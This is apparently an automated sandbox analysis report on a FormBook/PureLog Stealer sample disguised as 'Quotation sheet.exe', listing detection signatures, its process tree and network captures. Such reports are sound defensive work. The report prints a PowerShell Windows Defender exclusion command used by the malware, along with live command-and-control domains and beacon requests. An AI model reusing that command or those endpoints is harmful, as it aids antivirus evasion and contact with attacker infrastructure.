Windows Analysis Report
Quotation sheet.exe

Overview

General Information

Sample name:Quotation sheet.exe
Analysis ID:1562984
MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Quotation sheet.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\Quotation sheet.exe" MD5: 44AE4C9C2AB6623C0C1D04BB8B81871E)
    • powershell.exe (PID: 5996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • vbc.exe (PID: 4620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • UsMxwwTDRUHSSD.exe (PID: 3976 cmdline: "C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 356 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • UsMxwwTDRUHSSD.exe (PID: 2444 cmdline: "C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5876 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 7.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0.2.Quotation sheet.exe.5c50000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.Quotation sheet.exe.5c50000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 7.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0.2.Quotation sheet.exe.4379970.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation sheet.exe", ParentImage: C:\Users\user\Desktop\Quotation sheet.exe, ParentProcessId: 5448, ParentProcessName: Quotation sheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", ProcessId: 5996, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation sheet.exe", ParentImage: C:\Users\user\Desktop\Quotation sheet.exe, ParentProcessId: 5448, ParentProcessName: Quotation sheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", ProcessId: 5996, ProcessName: powershell.exe
                      No Suricata rule has matched

                      AV Detection

                      Source: http://www.acond-22-mvr.click/w9z4/Avira URL Cloud: Label: malware
                      Source: http://www.acond-22-mvr.click/w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI=Avira URL Cloud: Label: malware
                      Source: Quotation sheet.exeReversingLabs: Detection: 42%
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: Quotation sheet.exeJoe Sandbox ML: detected
                      Source: Quotation sheet.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation sheet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: Quotation sheet.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UsMxwwTDRUHSSD.exe, 00000008.00000000.2362478081.000000000091E000.00000002.00000001.01000000.0000000C.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3971822631.000000000091E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: Quotation sheet.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7C920 FindFirstFileW,FindNextFileW,FindClose,9_2_02D7C920
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then xor eax, eax9_2_02D69E10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then mov ebx, 00000004h9_2_053904E8

                      Networking

                      Source: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: Joe Sandbox ViewIP Address: 47.76.213.197 47.76.213.197
                      Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /7yx4/?4nJt=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQfxXg8RiZPfSfo9OGQETOHlofaWbM+4fubyGFlkwZbqaQYg0Zq5k=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /klhq/?4nJt=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+neDAiWkCkYZ57L047aTN0FvloZtiL1GHORQkvVBkncoqs6arxlw=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI= HTTP/1.1Host: www.acond-22-mvr.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /11t3/?4nJt=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01304IHNwj2Yod4wHZbXR5gNDbNQ3/FaK5QMq4IALVNsxgTOJYQtE8=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /2pji/?4nJt=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT4yZs3PgO7inQ/GZvdPSYtqhraoLnL30EVGtCNPTPRdM0+5LARJM=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.mrpokrovskii.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /egqi/?4nJt=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8hsZr969MltuXdWdWoGPR3ZZyiGe82JgugZANkAzsKk95fWmtipo=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.ytsd88.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /hyyd/?pXIDi=30N834GpBZU0OT&4nJt=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXzRX0Cz+jRSrIUTHSjZKbFGxkH1PP6E18JoqtQ6kBAoCTLA5p2fs= HTTP/1.1Host: www.matteicapital.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /rsvy/?4nJt=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rUtvmrzoHlx2y6yO58LrdYrj1cF4c73Y/2t0betNNlPaD+UeVatM=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.llljjjiii.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /huvt/?pXIDi=30N834GpBZU0OT&4nJt=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPYmXYZehu45VPp8MOy5WAu5nHK8ZcCMaFZ8i121M6teoDlc6/N3I= HTTP/1.1Host: www.ampsamkok88.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
                      Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                      Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                      Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                      Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                      Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
                      Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
                      Source: unknownHTTP traffic detected: POST /klhq/ HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.70kdd.topCache-Control: max-age=0Content-Length: 209Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.70kdd.top/klhq/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)Data Raw: 34 6e 4a 74 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 37 45 42 77 61 50 5a 62 37 4d 30 67 62 47 6f 6e 64 69 32 71 67 4a 38 64 41 48 68 77 30 66 67 49 30 50 59 2f 49 66 46 76 5a 4e 55 Data Ascii: 4nJt=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2c7EBwaPZb7M0gbGondi2qgJ8dAHhw0fgI0PY/IfFvZNU
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 26 Nov 2024 10:17:20 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 
6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 10:17:38 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 10:17:40 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 10:17:43 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
